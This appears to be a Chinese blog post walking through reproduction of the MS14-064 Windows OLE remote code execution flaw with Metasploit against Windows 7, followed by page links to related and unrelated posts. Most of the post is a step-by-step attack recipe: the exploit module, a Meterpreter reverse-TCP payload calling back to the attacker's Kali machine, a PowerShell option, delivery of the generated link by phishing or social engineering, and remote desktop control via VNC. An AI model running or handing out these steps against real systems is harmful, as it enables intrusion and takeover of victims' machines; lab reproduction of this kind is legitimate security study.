漏洞复现:MS14-064 OLE远程代码执行漏洞
MS14-064OLE远程代码执行漏洞
攻击机:Kali Linux 2019
靶机:Windows 7 x64、x32
攻击步骤:
1.打开攻击机Kali Linux 2019系统和靶机Windows 7系统

2.确定IP地址后,Kali Linux开启msf模块,准备攻击测试

3.在这里我们使用MS14-064OLE远程代码执行漏洞,开始搜索MS14-064
(search MS14-064)

4.我们利用use exploit/windows/browser/ms14_064_ole_code_execution 加载漏洞利用模块
(use exploit/windows/browser/ms14_064_ole_code_execution)

5.查看详细配置,进行下一步的详细配置

6.开始配置payload,Payload下的LHOST地址和模块下的SRVHOST地址
(Payload:set payload windows/meterpreter/reverse_tcp)
(LHOST地址:Kali Linux IP地址)
(SRVHOST地址:Kali Linux IP地址)

7.注意一下上图这个箭头位置,要把其中的默认false熟悉改为true,因为msf中自带的漏洞是利用exp调用的是powershell,所以msf的exp代码只对安装了powershell的系统生效,这里我们来用windows 7 系统进行测试。
(命令:set ALlowPowershellPrompt true)

8.输入exploit 进行测试,会生成一个url链接,用钓鱼方法或者是社会工程学传到Win7主机里,就可以实现控制




9.提取到权限,渗透完成,可以进行远程桌面操控,观察操作桌面等
(run vnc 观察操作界面)

漏洞复现:MS14-064 OLE远程代码执行漏洞的更多相关文章
- 【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞
		
漏洞描述 [漏洞预警]Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html ...
 - MS15-034漏洞复现、HTTP.SYS远程代码执行漏洞
		
#每次命令都百度去找命令,直接弄到博客方便些: 漏洞描述: 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635( ...
 - 复现CVE-2022-10270(向日葵远程代码执行漏洞)
		
警告 请勿使用本文提到的内容违反法律.本文不提供任何担保. 漏洞描述 向日葵是一款免费的,集远程控制电脑手机.远程桌面连接.远程开机.远程管理.支持内网穿透的一体化远程控制管理工具软件.CNVD披露了 ...
 - 【漏洞复现】Apache Solr远程代码执行(CVE-2019-0193)
		
0x01 概述 Solr简介 Apache Solr 是一个开源的企业级搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现.Apache Solr ...
 - 漏洞复现-CVE-2017-4971-Spring Web Flow 远程代码执行
		
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场)(兼顾反弹shell的攻击机) 0x01 影响版本 Spring ...
 - PHP远程代码执行漏洞复现(CVE-2019-11043)
		
漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...
 - Apache log4j2 远程代码执行漏洞复现👻
		
Apache log4j2 远程代码执行漏洞复现 最近爆出的一个Apache log4j2的远程代码执行漏洞听说危害程度极大哈,我想着也来找一下环境看看试一下.找了一会环境还真找到一个. 漏洞原理: ...
 - Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
		
1.漏洞描述 漏洞名称 Spring Framework远程代码执行漏洞 公开时间 2022-03-29 更新时间 2022-03-31 CVE编号 CVE-2022-22965 其他编号 QVD-2 ...
 - Samba远程代码执行漏洞(CVE-2017-7494)复现
		
简要记录一下Samba远程代码执行漏洞(CVE-2017-7494)环境搭建和利用的过程,献给那些想自己动手搭建环境的朋友.(虽然已过多时) 快捷通道:Docker ~ Samba远程代码执行漏洞(C ...
 
随机推荐
- HTTP1.0和HTTP1.1和HTTP2.0的区别
			
1 HTTP1.0和HTTP1.1的区别1.1 长连接(Persistent Connection) HTTP1.1支持长连接和请求的流水线处理,在一个TCP连接上可以传送多个HTTP请求 ...
 - Hibernate学习一:Hebinate入门以及一些小问题
			
1:Hebinate框架的简述: Hebinate框架主要用用在javaee开发中的dao层设计,实现对数据库的crud等操作, Hibernate的底层通过jdbc实现,通过对jdbc的封装,实现对 ...
 - Kafka 都有哪些特点?
			
高吞吐量.低延迟:kafka每秒可以处理几十万条消息,它的延迟最低只有几毫秒,每个topic可以分多个partition, consumer group 对partition进行consume操作. ...
 - CHAR 和 VARCHAR 的区别?
			
1.CHAR 和 VARCHAR 类型在存储和检索方面有所不同 2.CHAR 列长度固定为创建表时声明的长度,长度值范围是 1 到 255 当 CHAR 值被存储时,它们被用空格填充到特定长度,检索 ...
 - MariaDB CAST语法
			
Syntax CAST(expr AS type) Description CAST()函数采用一种类型的值,并产生另一种类型的值,类似于CONVERT函数. CAST()和CONVERT()之间的主 ...
 - Spring Bean生命周期回调
			
参阅官方文档:https://docs.spring.io/spring/docs/current/spring-framework-reference/core.html#beans-factory ...
 - scrapy基于请求传参实现深度爬取
			
请求传参实现深度爬取 请求传参: 实现深度爬取:爬取多个层级对应的页面数据 使用场景:爬取的数据没有在同一张页面中 在手动请求的时候传递item:yield scrapy.Request(url,ca ...
 - State Lattice Planner(状态栅格规划)
			
参考文献: Efficient constrained path planning via search in state lattices Differentially Constrained Mo ...
 - scanf()函数的原理
			
最近使用scanf发现了自己对scanf函数还是不太了解,主要出现在无意中出现的一个错误: scanf正确的写法是,scanf中以什么格式输入变量,则变量的类型就应该是什么格式,如下面scanf输入到 ...
 - Python的数据基础库Numpy怎样对数组进行排序
			
Numpy怎样对数组排序 Numpy给数组排序的三个方法: numpy.sort:返回排序后数组的拷贝 array.sort:原地排序数组而不是返回拷贝 numpy.argsort:间接排序,返回的是 ...